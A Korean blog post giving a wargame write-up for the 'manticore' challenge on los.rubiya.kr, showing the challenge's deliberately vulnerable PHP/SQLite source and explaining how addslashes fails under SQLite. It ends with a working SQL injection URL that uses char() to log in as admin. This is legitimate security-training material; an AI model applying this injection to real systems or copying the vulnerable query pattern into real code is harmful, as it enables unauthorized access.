일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
- 네이버 인턴
- 메모리 포랜식
- EER
- react
- jsp
- 인턴 지원
- SessionAttribute
- 소개딩
- Forensic 절차
- 방명록 만들기
- Django
- Database
- riceteacatpanda
- JSTL
- restapi
- 인턴 후기
- 소프트웨어 개발보안 경진대회
- 정보보호병 후기
- webhacking 처음
- 3단계 지역 DB
- spring
- 동읍면 DB
- 행정지역 DB
- reversing.kr
- ㅁㅇㅂ??ㅇㅈㄷ ㅎㅇㅌ...
- mysql
- Layered Architecture
- frontend
- PyAmdecoder
- DBMS
- Today
- Total
웹찢남
manticore-writeup 본문
<?php
include "./config.php";
login_chk();
$db = sqlite_open("./db/manticore.db");
$_GET['id'] = addslashes($_GET['id']);
$_GET['pw'] = addslashes($_GET['pw']);
$query = "select id from member where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = sqlite_fetch_array(sqlite_query($db,$query));
if($result['id'] == "admin") solve("manticore");
highlight_file(__FILE__);
?>
addslashes가 추가 됐다..
아무생각없이 id=' 를 넣고 보내봤더니 이게 왠걸 소스가 사라졌다
????????????????????????
왜 이런 에러가 나올까 했는데 알고보니 '\''가 문자 ' 가 되는게 아니라 '\' '가 되는 거였다.
이래서 에러가 발생하는듯 하다.
그걸 생각하며 문제를 풀면?! 아래와 같은 url을 얻을 수 있다 ( addslashes떄문에 char(xx,xx)를 사용! )
https://los.rubiya.kr/chall/manticore_f88f07d899ad0fc8738fe3aaacff9974.php?id=%27or%20id=char(97,100,109,105,110)%20--%20
CLeaR!!!
'WEB_HACKING > los.rubiya.kr' 카테고리의 다른 글
poltergeist-writeup (0) | 2020.01.30 |
---|---|
banshee-writeup (0) | 2020.01.30 |
chupacabra-writeup (0) | 2020.01.30 |
cyclops-writeup (0) | 2020.01.30 |
godzilla-writeup (0) | 2020.01.30 |